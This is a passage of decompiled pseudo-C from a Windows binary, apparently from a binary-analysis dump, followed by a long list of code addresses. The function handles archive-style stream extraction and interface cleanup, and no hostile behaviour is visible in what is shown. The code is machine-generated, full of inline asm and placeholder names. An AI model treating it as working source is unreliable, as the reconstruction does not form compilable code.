									__eflags = _t598;
									if(_t598 == 0) {
										L124:
										 *((intOrPtr*)( *(_t959 - 0x50) + 0x18)) = 0;
										 *(_t959 - 0x40) = 0;
										 *(_t959 - 0x4c) =  *( *(_t959 - 0xa0));
										_t602 = E00434120( *(_t959 - 0x48),  *((intOrPtr*)(_t776 + 0x58)));
										 *(_t959 + 0x17) =  *(_t959 + 0x17) & 0x00000000;
										_t324 = _t959 - 0x2d;
										 *_t324 =  *(_t959 - 0x2d) & 0x00000000;
										__eflags =  *_t324;
										 *(_t959 - 0x60) = _t602;
										 *(_t959 - 0x48) = 0;
										while(1) {
											asm("sbb ecx, [edi+0x4c]");
											__eflags =  *((intOrPtr*)(_t939 + 0x40)) -  *((intOrPtr*)(_t939 + 0x48)) |  *(_t939 + 0x44);
											if(( *((intOrPtr*)(_t939 + 0x40)) -  *((intOrPtr*)(_t939 + 0x48)) |  *(_t939 + 0x44)) == 0) {
												break;
											}
											_t833 =  *((intOrPtr*)(_t959 + 8));
											__eflags =  *(_t959 - 0x4c) -  *((intOrPtr*)(_t833 + 0x10));
											if( *(_t959 - 0x4c) >=  *((intOrPtr*)(_t833 + 0x10))) {
												L200:
												_t949 = E00434C64(_t939);
												__eflags = _t949;
												if(_t949 == 0) {
													L203:
													 *(_t959 - 0x3c) =  *(_t959 - 0x3c) +  *(_t959 - 0x68);
													 *(_t959 - 4) = 9;
													asm("adc [ebp-0x38], eax");
													E0043361B(_t959 - 0x34);
													goto L43;
												}
												L201:
												 *(_t959 - 4) = 9;
												E0043361B(_t959 - 0x34);
												 *(_t959 - 4) = 8;
												E00408604(_t959 - 0x84);
												 *(_t959 - 4) = 6;
												E0043361B(_t959 - 0x14);
												 *(_t959 - 4) = 5;
												E0043361B(_t959 - 0x18);
												 *(_t959 - 4) = 4;
												E0043361B(_t959 - 0x1c);
												 *(_t959 - 4) = 3;
												E0043361B(_t959 - 0x20);
												 *(_t959 - 4) = 2;
												E0043361B(_t959 - 0x28);
												_t512 = _t959 - 4;
												 *_t512 =  *(_t959 - 4) & 0x00000000;
												__eflags =  *_t512;
												E0043361B(_t959 - 0x2c);
												goto L202;
											}
											__eflags =  *(_t959 - 0x48);
											_t952 =  *((intOrPtr*)( *((intOrPtr*)(_t833 + 0x14)) +  *(_t959 - 0x4c) * 4));
											 *(_t959 - 0x54) =  *( *((intOrPtr*)(_t952 + 0x5c)) +  *(_t959 - 0x60) * 4);
											if( *(_t959 - 0x48) != 0) {
												L133:
												_t627 =  *(_t959 - 0x54);
												_t836 =  *(_t959 - 0x50);
												__eflags =  *(_t959 - 0x48) - ( *(_t627 + 4) & 0x0000ffff);
												if( *(_t959 - 0x48) != ( *(_t627 + 4) & 0x0000ffff)) {
													 *(_t959 - 0x48) =  *(_t959 - 0x48) + 1;
													 *(_t836 + 0x20) =  *(_t836 + 0x20) & 0x00000000;
													__eflags =  *(_t959 - 0x2d);
													if(__eflags == 0) {
														_t372 = _t836 + 0x14;
														 *_t372 =  *(_t836 + 0x14) & 0x00000000;
														__eflags =  *_t372;
													}
													_t631 = E00433AD8(_t836, __eflags, _t959 - 0xa4, _t959 - 0x9c);
													__eflags = _t631 - 1;
													 *(_t959 - 0x40) = _t631;
													if(_t631 == 1) {
														break;
													} else {
														__eflags = _t631;
														if(_t631 == 0) {
															__eflags =  *(_t959 - 0x9c);
															 *(_t959 - 0x2d) =  *(_t959 - 0x9c) == 0;
															__eflags =  *(_t959 - 0x2d);
															if( *(_t959 - 0x2d) != 0) {
																continue;
															}
															_t925 =  *(_t959 - 0x98);
															asm("adc ecx, [ebp-0x38]");
															_t954 =  *((intOrPtr*)(_t959 - 0x8c)) +  *((intOrPtr*)(_t959 - 0xa4));
															_t779 = 0;
															 *((intOrPtr*)(_t925 + 0x28)) =  *((intOrPtr*)(_t939 + 0x48)) +  *(_t959 - 0x3c);
															asm("adc [ebp-0x88], ebx");
															 *((intOrPtr*)(_t925 + 0x2c)) =  *((intOrPtr*)(_t939 + 0x4c));
															 *((intOrPtr*)(_t925 + 0x20)) = _t954;
															 *((intOrPtr*)(_t959 - 0x8c)) = _t954;
															 *((intOrPtr*)(_t925 + 0x24)) =  *((intOrPtr*)(_t959 - 0x88));
															_t949 = E0040F554(_t925);
															__eflags = _t949 - _t779;
															if(_t949 == _t779) {
																_t636 =  *(_t939 + 0x44);
																_t840 =  *((intOrPtr*)(_t939 + 0x40)) -  *((intOrPtr*)(_t939 + 0x48));
																__eflags = _t840;
																asm("sbb eax, [edi+0x4c]");
																 *(_t959 - 0x70) = _t840;
																 *(_t959 - 0x6c) = _t636;
																if(_t840 != 0) {
																	L170:
																	_t840 = 0x8000;
																	_t636 = 0;
																	__eflags = 0;
																	 *(_t959 - 0x70) = 0x8000;
																	 *(_t959 - 0x6c) = 0;
																	L171:
																	_t926 =  *(_t959 - 0x9c);
																	__eflags = _t636;
																	if(__eflags < 0) {
																		L175:
																		_t640 = ( *( *(_t959 - 0x54) + 6) & 0x0000000f) - _t779;
																		__eflags = _t640;
																		if(_t640 == 0) {
																			_t641 =  *(_t959 - 0x28);
																			L183:
																			 *(_t959 - 0x40) =  *((intOrPtr*)( *_t641 + 0xc))(_t641,  *(_t959 - 0x14),  *(_t959 - 0x34), _t779, _t959 - 0x70, _t779);
																			L184:
																			__eflags =  *(_t959 - 0x40) - _t779;
																			if( *(_t959 - 0x40) == _t779) {
																				 *(_t959 + 0x17) = 1;
																				continue;
																			}
																			__eflags =  *(_t959 - 0x40) - 1;
																			if( *(_t959 - 0x40) == 1) {
																				goto L200;
																			}
																			_t643 =  *(_t959 - 0x34);
																			 *(_t959 - 4) = 9;
																			__eflags = _t643;
																			if(_t643 != 0) {
																				 *((intOrPtr*)( *_t643 + 8))(_t643);
																			}
																			 *(_t959 - 4) = 8;
																			E00408604(_t959 - 0x84);
																			_t645 =  *(_t959 - 0x14);
																			 *(_t959 - 4) = 6;
																			__eflags = _t645;
																			if(_t645 != 0) {
																				 *((intOrPtr*)( *_t645 + 8))(_t645);
																			}
																			_t646 =  *(_t959 - 0x18);
																			 *(_t959 - 4) = 5;
																			__eflags = _t646;
																			if(_t646 != 0) {
																				 *((intOrPtr*)( *_t646 + 8))(_t646);
																			}
																			_t647 =  *(_t959 - 0x1c);
																			 *(_t959 - 4) = 4;
																			__eflags = _t647;
																			if(_t647 != 0) {
																				 *((intOrPtr*)( *_t647 + 8))(_t647);
																			}
																			 *(_t959 - 4) = 3;
																			E0043361B(_t959 - 0x20);
																			 *(_t959 - 4) = 2;
																			E0043361B(_t959 - 0x28);
																			_t489 = _t959 - 4;
																			 *_t489 =  *(_t959 - 4) & 0x00000000;
																			__eflags =  *_t489;
																			E0043361B(_t959 - 0x2c);
																			L195:
																			_t538 =  *(_t959 - 0x40);
																			goto L41;
																		}
																		_t655 = _t640 - 1;
																		__eflags = _t655;
																		if(_t655 == 0) {
																			 *((char*)( *(_t959 - 0x94) + 0xd52)) =  *(_t959 + 0x17);
																			_t641 =  *(_t959 - 0x20);
																			goto L183;
																		}
																		_t657 = _t655 - 1;
																		__eflags = _t657;
																		if(_t657 == 0) {
																			 *((char*)( *(_t959 - 0x5c) + 0x84)) =  *(_t959 + 0x17);
																			_t641 =  *(_t959 - 0x18);
																			goto L183;
																		}
																		__eflags = _t657 != 1;
																		if(_t657 != 1) {
																			goto L184;
																		}
																		 *((char*)( *(_t959 - 0x58) + 0x1cb8)) =  *(_t959 + 0x17);
																		_t641 =  *(_t959 - 0x1c);
																		goto L183;
																	}
																	if(__eflags > 0) {
																		L174:
																		 *(_t959 - 0x70) = _t926;
																		 *(_t959 - 0x6c) = 0;
																		goto L175;
																	}
																	__eflags = _t840 - _t926;
																	if(_t840 <= _t926) {
																		goto L175;
																	}
																	goto L174;
																}
																__eflags = _t840 - 0x8000;
																if(_t840 <= 0x8000) {
																	goto L171;
																}
																goto L170;
															}
															_t661 =  *(_t959 - 0x34);
															 *(_t959 - 4) = 9;
															__eflags = _t661 - _t779;
															if(_t661 != _t779) {
																 *((intOrPtr*)( *_t661 + 8))(_t661);
															}
															 *(_t959 - 4) = 8;
															E00408604(_t959 - 0x84);
															_t663 =  *(_t959 - 0x14);
															 *(_t959 - 4) = 6;
															__eflags = _t663 - _t779;
															if(_t663 != _t779) {
																 *((intOrPtr*)( *_t663 + 8))(_t663);
															}
															_t664 =  *(_t959 - 0x18);
															 *(_t959 - 4) = 5;
															__eflags = _t664 - _t779;
															if(_t664 != _t779) {
																 *((intOrPtr*)( *_t664 + 8))(_t664);
															}
															_t665 =  *(_t959 - 0x1c);
															 *(_t959 - 4) = 4;
															__eflags = _t665 - _t779;
															if(_t665 != _t779) {
																 *((intOrPtr*)( *_t665 + 8))(_t665);
															}
															_t666 =  *(_t959 - 0x20);
															 *(_t959 - 4) = 3;
															__eflags = _t666 - _t779;
															if(_t666 != _t779) {
																 *((intOrPtr*)( *_t666 + 8))(_t666);
															}
															_t667 =  *(_t959 - 0x28);
															 *(_t959 - 4) = 2;
															__eflags = _t667 - _t779;
															if(_t667 != _t779) {
																 *((intOrPtr*)( *_t667 + 8))(_t667);
															}
															_t582 =  *(_t959 - 0x2c);
															 *(_t959 - 4) =  *(_t959 - 4) & 0x00000000;
															__eflags = _t582 - _t779;
															goto L63;
														}
														_t674 =  *(_t959 - 0x34);
														 *(_t959 - 4) = 9;
														__eflags = _t674;
														if(_t674 != 0) {
															 *((intOrPtr*)( *_t674 + 8))(_t674);
														}
														 *(_t959 - 4) = 8;
														E00408604(_t959 - 0x84);
														_t676 =  *(_t959 - 0x14);
														 *(_t959 - 4) = 6;
														__eflags = _t676;
														if(_t676 != 0) {
															 *((intOrPtr*)( *_t676 + 8))(_t676);
														}
														_t677 =  *(_t959 - 0x18);
														 *(_t959 - 4) = 5;
														__eflags = _t677;
														if(_t677 != 0) {
															 *((intOrPtr*)( *_t677 + 8))(_t677);
														}
														_t678 =  *(_t959 - 0x1c);
														 *(_t959 - 4) = 4;
														__eflags = _t678;
														if(_t678 != 0) {
															 *((intOrPtr*)( *_t678 + 8))(_t678);
														}
														_t679 =  *(_t959 - 0x20);
														 *(_t959 - 4) = 3;
														__eflags = _t679;
														if(_t679 != 0) {
															 *((intOrPtr*)( *_t679 + 8))(_t679);
														}
														_t680 =  *(_t959 - 0x28);
														 *(_t959 - 4) = 2;
														__eflags = _t680;
														if(_t680 != 0) {
															 *((intOrPtr*)( *_t680 + 8))(_t680);
														}
														_t681 =  *(_t959 - 0x2c);
														 *(_t959 - 4) =  *(_t959 - 4) & 0x00000000;
														__eflags = _t681;
														if(_t681 != 0) {
															 *((intOrPtr*)( *_t681 + 8))(_t681);
														}
														goto L195;
													}
												}
												 *(_t959 - 0x4c) =  *(_t959 - 0x4c) + 1;
												 *(_t959 - 0x60) =  *(_t959 - 0x60) & 0x00000000;
												 *(_t959 - 0x48) =  *(_t959 - 0x48) & 0x00000000;
												continue;
											}
											_t777 =  *(_t959 - 0x50);
											E0040C9B4(_t777 + 8,  *((intOrPtr*)(_t952 + 0x78)));
											_t691 =  *(_t952 + 0xe) >> 2;
											__eflags = _t691 & 0x00000001;
											if((_t691 & 0x00000001) == 0) {
												_t692 = 0;
												__eflags = 0;
											} else {
												_t692 =  *(_t952 + 0x17) & 0x000000ff;
											}
											 *(_t777 + 0x1c) = _t692 & 0x000000ff;
											_t694 =  *((intOrPtr*)(_t952 + 0x78));
											asm("adc ebx, [esi+0x4]");
											_t949 =  *((intOrPtr*)( *_t694 + 0x10))(_t694,  *( *(_t959 - 0x54)) +  *_t952, 0, 0, 0);
											__eflags = _t949;
											if(_t949 == 0) {
												goto L133;
											} else {
												goto L132;
											}
										}
										__eflags =  *(_t959 - 0x40);
										if( *(_t959 - 0x40) != 0) {
											goto L200;
										}
										_t949 = E004349A7(_t939);
										__eflags = _t949;
										if(_t949 != 0) {
											goto L201;
										}
										asm("sbb ecx, [edi+0x4c]");
										__eflags =  *((intOrPtr*)(_t939 + 0x40)) -  *((intOrPtr*)(_t939 + 0x48)) |  *(_t939 + 0x44);
										if(( *((intOrPtr*)(_t939 + 0x40)) -  *((intOrPtr*)(_t939 + 0x48)) |  *(_t939 + 0x44)) == 0) {
											goto L203;
										}
										goto L200;
									} else {
										_t698 = _t598 - 1;
										__eflags = _t698;
										if(_t698 == 0) {
											__eflags =  *(_t959 - 0x94);
											if( *(_t959 - 0x94) == 0) {
												_push(0xd68);
												_t872 = E004079F2();
												 *(_t959 + 0x14) = _t872;
												__eflags = _t872;
												 *(_t959 - 4) = 0xd;
												if(_t872 == 0) {
													_t701 = 0;
													__eflags = 0;
												} else {
													_t701 = E0041F0B9(_t872);
												}
												 *(_t959 - 4) = 0xc;
												 *(_t959 - 0x94) = _t701;
												E0040C9B4(_t959 - 0x20, _t701);
											}
											 *( *(_t959 - 0x50) + 0x21) = 1;
											goto L124;
										}
										_t703 = _t698 - 1;
										__eflags = _t703;
										if(_t703 == 0) {
											__eflags =  *(_t959 - 0x5c);
											if( *(_t959 - 0x5c) == 0) {
												_push(0x7b8);
												_t876 = E004079F2();
												 *(_t959 + 0x14) = _t876;
												__eflags = _t876;
												 *(_t959 - 4) = 0xf;
												if(__eflags == 0) {
													_t706 = 0;
													__eflags = 0;
												} else {
													_t706 = E004358FF(_t876, __eflags);
												}
												 *(_t959 - 4) = 0xc;
												 *(_t959 - 0x5c) = _t706;
												E0040C9B4(_t959 - 0x18, _t706);
											}
											 *( *(_t959 - 0x5c) + 0x80) =  *(_t950 + 7) & 0x000000ff;
											goto L124;
										}
										__eflags = _t703 == 1;
										if(_t703 == 1) {
											__eflags =  *(_t959 - 0x58);
											if( *(_t959 - 0x58) == 0) {
												_push(0x1cc8);
												_t880 = E004079F2();
												 *(_t959 + 0x14) = _t880;
												__eflags = _t880;
												 *(_t959 - 4) = 0xe;
												if(__eflags == 0) {
													_t712 = 0;
													__eflags = 0;
												} else {
													_t712 = E00450870(_t880, __eflags, 0);
												}
												 *(_t959 - 4) = 0xc;
												 *(_t959 - 0x58) = _t712;
												E0040C9B4(_t959 - 0x1c, _t712);
											}
											_t949 = E00451F20( *(_t959 - 0x58),  *(_t950 + 7) & 0x000000ff);
											__eflags = _t949;
											if(_t949 == 0) {
												goto L124;
											} else {
												L132:
												_t696 =  *(_t959 - 0x34);
												 *(_t959 - 4) = 9;
												goto L50;
											}
										}
										_t949 = E00434CD8(_t939);
										__eflags = _t949;
										if(_t949 != 0) {
											goto L132;
										}
										 *(_t959 - 4) = 9;
										_t285 = _t959 - 0x3c;
										 *_t285 =  *(_t959 - 0x3c) +  *(_t959 - 0x68);
										__eflags =  *_t285;
										asm("adc [ebp-0x38], eax");
										_t717 =  *(_t959 - 0x34);
										goto L103;
									}
								}
								__eflags =  *(_t959 - 0x90);
								_t781 = 0 |  *(_t959 - 0x90) != 0x00000000;
								 *(_t959 + 0x14) =  *(_t959 + 0x14) & 0x00000000;
								_t940 =  *((intOrPtr*)(_t959 + 0x18));
								 *(_t959 - 4) = 0xb;
								_t949 =  *((intOrPtr*)( *_t940 + 0x14))(_t940, _t947, _t959 + 0x14, _t781);
								__eflags = _t949;
								if(_t949 != 0) {
									L72:
									_t696 =  *(_t959 + 0x14);
									 *(_t959 - 4) = 9;
									goto L50;
								}
								_t949 =  *((intOrPtr*)( *_t940 + 0x18))(_t940, _t781);
								__eflags = _t949;
								if(_t949 == 0) {
									_t734 =  *(_t959 + 0x14);
									__eflags = _t734;
									if(_t734 != 0) {
										 *((intOrPtr*)( *_t734 + 8))(_t734);
										_t190 = _t959 + 0x14;
										 *_t190 =  *(_t959 + 0x14) & 0x00000000;
										__eflags =  *_t190;
									}
									_t949 =  *((intOrPtr*)( *_t940 + 0x1c))(_t940, 2);
									_t717 =  *(_t959 + 0x14);
									__eflags = _t949;
									 *(_t959 - 4) = 9;
									goto L76;
								}
								goto L72;
							} else {
								__eflags =  *(_t959 - 0x90);
								_t783 = 0 |  *(_t959 - 0x90) != 0x00000000;
								 *(_t959 + 0x14) =  *(_t959 + 0x14) & 0x00000000;
								_t941 =  *((intOrPtr*)(_t959 + 0x18));
								 *(_t959 - 4) = 0xa;
								_t949 =  *((intOrPtr*)( *_t941 + 0x14))(_t941, _t947, _t959 + 0x14, _t783);
								__eflags = _t949;
								if(_t949 == 0) {
									_t949 =  *((intOrPtr*)( *_t941 + 0x18))(_t941, _t783);
									__eflags = _t949;
									if(_t949 != 0) {
										goto L49;
									}
									_t742 =  *(_t959 + 0x14);
									__eflags = _t742;
									if(_t742 != 0) {
										 *((intOrPtr*)( *_t742 + 8))(_t742);
										_t169 = _t959 + 0x14;
										 *_t169 =  *(_t959 + 0x14) & _t949;
										__eflags =  *_t169;
									}
									_t949 =  *((intOrPtr*)( *_t941 + 0x1c))(_t941, 0);
									_t717 =  *(_t959 + 0x14);
									__eflags = _t949;
									 *(_t959 - 4) = 9;
									L76:
									if(__eflags == 0) {
										L103:
										__eflags = _t717;
										if(_t717 != 0) {
											 *((intOrPtr*)( *_t717 + 8))(_t717);
										}
										continue;
									}
									L50:
									__eflags = _t696;
									if(_t696 != 0) {
										 *((intOrPtr*)( *_t696 + 8))(_t696);
									}
									L52:
									 *(_t959 - 4) = 8;
									E00408604(_t959 - 0x84);
									_t577 =  *(_t959 - 0x14);
									 *(_t959 - 4) = 6;
									__eflags = _t577;
									if(_t577 != 0) {
										 *((intOrPtr*)( *_t577 + 8))(_t577);
									}
									_t578 =  *(_t959 - 0x18);
									 *(_t959 - 4) = 5;
									__eflags = _t578;
									if(_t578 != 0) {
										 *((intOrPtr*)( *_t578 + 8))(_t578);
									}
									_t579 =  *(_t959 - 0x1c);
									 *(_t959 - 4) = 4;
									__eflags = _t579;
									if(_t579 != 0) {
										 *((intOrPtr*)( *_t579 + 8))(_t579);
									}
									_t580 =  *(_t959 - 0x20);
									 *(_t959 - 4) = 3;
									__eflags = _t580;
									if(_t580 != 0) {
										 *((intOrPtr*)( *_t580 + 8))(_t580);
									}
									_t581 =  *(_t959 - 0x28);
									 *(_t959 - 4) = 2;
									__eflags = _t581;
									if(_t581 != 0) {
										 *((intOrPtr*)( *_t581 + 8))(_t581);
									}
									_t582 =  *(_t959 - 0x2c);
									 *(_t959 - 4) =  *(_t959 - 4) & 0x00000000;
									__eflags = _t582;
									L63:
									if(__eflags != 0) {
										 *((intOrPtr*)( *_t582 + 8))(_t582);
									}
									L202:
									_t538 = _t949;
									goto L41;
								}
								L49:
								_t696 =  *(_t959 + 0x14);
								 *(_t959 - 4) = 9;
								goto L50;
							}
						}
						 *(_t959 - 4) = 8;
						E00408604(_t959 - 0x84);
						 *(_t959 - 4) = 6;
						E0043361B(_t959 - 0x14);
						 *(_t959 - 4) = 5;
						E0043361B(_t959 - 0x18);
						 *(_t959 - 4) = 4;
						E0043361B(_t959 - 0x1c);
						 *(_t959 - 4) = 3;
						E0043361B(_t959 - 0x20);
						 *(_t959 - 4) = 2;
						E0043361B(_t959 - 0x28);
						_t533 = _t959 - 4;
						 *_t533 =  *(_t959 - 4) & 0x00000000;
						__eflags =  *_t533;
						E0043361B(_t959 - 0x2c);
						goto L205;
					} else {
						_t746 =  *(_t959 - 0x14);
						 *(_t959 - 4) = 6;
						__eflags = _t746;
						if(_t746 != 0) {
							 *((intOrPtr*)( *_t746 + 8))(_t746);
						}
						_t747 =  *(_t959 - 0x18);
						 *(_t959 - 4) = 5;
						__eflags = _t747;
						if(_t747 != 0) {
							 *((intOrPtr*)( *_t747 + 8))(_t747);
						}
						_t748 =  *(_t959 - 0x1c);
						 *(_t959 - 4) = 4;
						__eflags = _t748;
						if(_t748 != 0) {
							 *((intOrPtr*)( *_t748 + 8))(_t748);
						}
						_t749 =  *(_t959 - 0x20);
						 *(_t959 - 4) = 3;
						__eflags = _t749;
						if(_t749 != 0) {
							 *((intOrPtr*)( *_t749 + 8))(_t749);
						}
						_t750 =  *(_t959 - 0x28);
						 *(_t959 - 4) = 2;
						__eflags = _t750;
						if(_t750 != 0) {
							 *((intOrPtr*)( *_t750 + 8))(_t750);
						}
						_t751 =  *(_t959 - 0x2c);
						 *(_t959 - 4) =  *(_t959 - 4) & 0x00000000;
						__eflags = _t751;
						if(_t751 != 0) {
							 *((intOrPtr*)( *_t751 + 8))(_t751);
						}
						_t538 = 0x8007000e;
						L41:
						 *[fs:0x0] =  *((intOrPtr*)(_t959 - 0xc));
						return _t538;
					}
				}
			}

0x00434d2d
0x00434d3b
0x00434d41
0x00434d44
0x00434d47
0x00434d4f
0x00434d57
0x00434d57
0x00434d5d
0x004358f2
0x004358f2
0x00000000
0x00434d63
0x00434d66
0x00434d69
0x00434d6c
0x00434d73
0x00434d7c
0x00434d7e
0x00434d81
0x00434d84
0x00000000
0x00000000
0x00434d8a
0x00434d8f
0x00434d8f
0x00434d92
0x00434d9b
0x00434da9
0x00434db5
0x00434dbe
0x00434dc6
0x00434dc8
0x00434dcb
0x00434dcb
0x00434dd1
0x00434ddb
0x00434ddd
0x00434ddd
0x00434de2
0x00434de2
0x00434de5
0x00434de8
0x00434deb
0x00434df7
0x00434dfc
0x00434dfe
0x00434e01
0x00434e04
0x00434e0a
0x00434e16
0x00434e18
0x00434e1b
0x00434e1d
0x00434e21
0x00434e2c
0x00434e2c
0x00434e23
0x00434e28
0x00434e28
0x00434e2e
0x00434e32
0x00434e34
0x00434e3a
0x00434e3d
0x00434e42
0x00434e42
0x00434e45
0x00434e49
0x00434e4d
0x00434e52
0x00434e54
0x00434e59
0x00434e5c
0x00434e80
0x00434e80
0x00434e5e
0x00434e5e
0x00434e65
0x00434e68
0x00434e6b
0x00434e6e
0x00434e71
0x00434e77
0x00434e77
0x00434e82
0x00434e84
0x00434e87
0x00434e8c
0x00434e8c
0x00434e8f
0x00434e95
0x00434e98
0x00434e9b
0x00434e9e
0x00434ea1
0x00434ea4
0x00434ea6
0x00434eaa
0x00434eb0
0x00434eb3
0x00434eb5
0x00434eb9
0x00434ec6
0x00434ec6
0x00434ebb
0x00434ec2
0x00434ec2
0x00434ec8
0x00434eca
0x00434ecd
0x00434ed1
0x00434ed4
0x00434ed9
0x00434ed9
0x00434ede
0x00434ee2
0x00434ee7
0x00434ee9
0x00434f6f
0x00434f74
0x00434f7e
0x00434f82
0x00434f85
0x00434f85
0x00434f85
0x00434f88
0x00434f8b
0x00000000
0x00000000
0x00434f91
0x00434f95
0x00434fa1
0x00434f97
0x00434f97
0x00434f97
0x00434fa4
0x00434fa7
0x00434fb0
0x00434fb3
0x00434fbb
0x00434fc4
0x00434fc7
0x00434fcd
0x00434fd0
0x00434fd2
0x004350cd
0x004350d2
0x004350d4
0x004350d7
0x0043514f
0x00435158
0x0043515b
0x0043515e
0x00435163
0x00435163
0x00435166
0x00000000
0x00000000
0x00435170
0x00435175
0x00435175
0x00435182
0x0043518a
0x00435197
0x00435197
0x00435199
0x0043519b
0x0043519e
0x004351a1
0x004351a1
0x004351a4
0x004351a7
0x00000000
0x00000000
0x004351ad
0x004351b1
0x004351b6
0x004351b6
0x004351b9
0x004351c5
0x004351d3
0x004351d9
0x004351dc
0x004351df
0x0043522d
0x0043522d
0x00000000
0x004351e1
0x004351e5
0x004351ea
0x004351ed
0x00000000
0x00000000
0x00000000
0x00000000
0x004351ef
0x004351ef
0x004351f2
0x004351f5
0x00000000
0x00000000
0x004351ff
0x00435204
0x00435204
0x00435211
0x0043521c
0x00435223
0x00435223
0x00435225
0x00435227
0x0043522a
0x00000000
0x0043522a
0x004351df
0x00435235
0x0043523e
0x00435244
0x0043524d
0x00435256
0x0043525e
0x00435260
0x00435262
0x00000000
0x00000000
0x00435268
0x0043526a
0x0043526f
0x00435272
0x0043528c
0x0043528c
0x00435274
0x00435276
0x00435278
0x0043527b
0x0043527e
0x00435281
0x00435284
0x00435284
0x0043528e
0x00435290
0x00435293
0x00435298
0x00435298
0x004352a1
0x004352b6
0x004352d2
0x004352da
0x004352e4
0x004352e4
0x004352e7
0x00435414
0x0043541c
0x00435428
0x0043542d
0x00435430
0x00435435
0x00435439
0x00435439
0x00435439
0x0043543d
0x00435440
0x00435443
0x0043544c
0x0043544f
0x00435451
0x00000000
0x00000000
0x00435457
0x0043545d
0x00435460
0x00435807
0x0043580e
0x00435810
0x00435812
0x0043587e
0x00435884
0x0043588a
0x0043588e
0x00435891
0x00000000
0x00435891
0x00435814
0x00435817
0x0043581b
0x00435826
0x0043582a
0x00435832
0x00435836
0x0043583e
0x00435842
0x0043584a
0x0043584e
0x00435856
0x0043585a
0x00435862
0x00435866
0x0043586b
0x0043586b
0x0043586b
0x00435872
0x00000000
0x00435872
0x0043546b
0x00435472
0x0043547e
0x00435481
0x004354d6
0x004354d6
0x004354d9
0x004354e0
0x004354e3
0x004354f5
0x004354f8
0x004354fc
0x00435500
0x00435502
0x00435502
0x00435502
0x00435502
0x00435514
0x00435519
0x0043551c
0x0043551f
0x00000000
0x00435525
0x00435525
0x00435527
0x004355bc
0x004355c3
0x004355c7
0x004355cb
0x00000000
0x00000000
0x004355e0
0x004355e8
0x004355eb
0x004355f1
0x004355f2
0x004355f5
0x004355fb
0x00435604
0x00435609
0x0043560f
0x00435617
0x00435619
0x0043561b
0x004356a7
0x004356aa
0x004356aa
0x004356ad
0x004356b0
0x004356b3
0x004356b6
0x004356c0
0x004356c0
0x004356c5
0x004356c5
0x004356c7
0x004356ca
0x004356cd
0x004356cd
0x004356d5
0x004356d7
0x004356e5
0x004356ee
0x004356ee
0x004356f0
0x00435731
0x00435734
0x00435746
0x00435749
0x00435749
0x0043574c
0x004357db
0x00000000
0x004357db
0x00435752
0x00435756
0x00000000
0x00000000
0x0043575c
0x0043575f
0x00435763
0x00435765
0x0043576a
0x0043576a
0x00435773
0x00435777
0x0043577c
0x0043577f
0x00435783
0x00435785
0x0043578a
0x0043578a
0x0043578d
0x00435790
0x00435794
0x00435796
0x0043579b
0x0043579b
0x0043579e
0x004357a1
0x004357a5
0x004357a7
0x004357ac
0x004357ac
0x004357b2
0x004357b6
0x004357be
0x004357c2
0x004357c7
0x004357c7
0x004357c7
0x004357ce
0x004357d3
0x004357d3
0x00000000
0x004357d3
0x004356f2
0x004356f2
0x004356f3
0x00435726
0x0043572c
0x00000000
0x0043572c
0x004356f5
0x004356f5
0x004356f6
0x00435712
0x00435718
0x00000000
0x00435718
0x004356f8
0x004356f9
0x00000000
0x00000000
0x00435701
0x00435707
0x00000000
0x00435707
0x004356d9
0x004356df
0x004356df
0x004356e2
0x00000000
0x004356e2
0x004356db
0x004356dd
0x00000000
0x00000000
0x00000000
0x004356dd
0x004356b8
0x004356be
0x00000000
0x00000000
0x00000000
0x004356be
0x00435621
0x00435624
0x00435628
0x0043562a
0x0043562f
0x0043562f
0x00435638
0x0043563c
0x00435641
0x00435644
0x00435648
0x0043564a
0x0043564f
0x0043564f
0x00435652
0x00435655
0x00435659
0x0043565b
0x00435660
0x00435660
0x00435663
0x00435666
0x0043566a
0x0043566c
0x00435671
0x00435671
0x00435674
0x00435677
0x0043567b
0x0043567d
0x00435682
0x00435682
0x00435685
0x00435688
0x0043568c
0x0043568e
0x00435693
0x00435693
0x00435696
0x00435699
0x0043569d
0x00000000
0x0043569d
0x0043552d
0x00435530
0x00435534
0x00435536
0x0043553b
0x0043553b
0x00435544
0x00435548
0x0043554d
0x00435550
0x00435554
0x00435556
0x0043555b
0x0043555b
0x0043555e
0x00435561
0x00435565
0x00435567
0x0043556c
0x0043556c
0x0043556f
0x00435572
0x00435576
0x00435578
0x0043557d
0x0043557d
0x00435580
0x00435583
0x00435587
0x00435589
0x0043558e
0x0043558e
0x00435591
0x00435594
0x00435598
0x0043559a
0x0043559f
0x0043559f
0x004355a2
0x004355a5
0x004355a9
0x004355ab
0x004355b4
0x004355b4
0x00000000
0x004355ab
0x0043551f
0x004354e5
0x004354e8
0x004354ec
0x00000000
0x004354ec
0x00435483
0x0043548c
0x00435494
0x00435497
0x00435499
0x004354a1
0x004354a1
0x0043549b
0x0043549b
0x0043549b
0x004354ab
0x004354b0
0x004354bb
0x004354c4
0x004354c6
0x004354c8
0x00000000
0x00000000
0x00000000
0x00000000
0x004354c8
0x004357e4
0x004357e8
0x00000000
0x00000000
0x004357f1
0x004357f3
0x004357f5
0x00000000
0x00000000
0x00435800
0x00435803
0x00435805
0x00000000
0x00000000
0x00000000
0x004352ed
0x004352ed
0x004352ed
0x004352ee
0x004353d0
0x004353d7
0x004353d9
0x004353e4
0x004353e6
0x004353e9
0x004353eb
0x004353ef
0x004353f8
0x004353f8
0x004353f1
0x004353f1
0x004353f1
0x004353fe
0x00435402
0x00435408
0x00435408
0x00435410
0x00000000
0x00435410
0x004352f4
0x004352f4
0x004352f5
0x0043538a
0x0043538e
0x00435390
0x0043539b
0x0043539d
0x004353a0
0x004353a2
0x004353a6
0x004353af
0x004353af
0x004353a8
0x004353a8
0x004353a8
0x004353b5
0x004353b9
0x004353bc
0x004353bc
0x004353c8
0x00000000
0x004353c8
0x004352fb
0x004352fc
0x00435335
0x00435339
0x0043533b
0x00435346
0x00435348
0x0043534b
0x0043534d
0x00435351
0x0043535c
0x0043535c
0x00435353
0x00435355
0x00435355
0x00435362
0x00435366
0x00435369
0x00435369
0x0043537b
0x0043537d
0x0043537f
0x00000000
0x00435385
0x004354ca
0x004354ca
0x004354cd
0x00000000
0x004354cd
0x0043537f
0x00435305
0x00435307
0x00435309
0x00000000
0x00000000
0x00435312
0x00435316
0x00435316
0x00435316
0x0043531c
0x0043531f
0x00000000
0x0043531f
0x004352e7
0x004350db
0x004350e1
0x004350e4
0x004350e8
0x004350f4
0x004350fb
0x004350fd
0x004350ff
0x0043510e
0x0043510e
0x00435111
0x00000000
0x00435111
0x00435108
0x0043510a
0x0043510c
0x0043511a
0x0043511d
0x0043511f
0x00435124
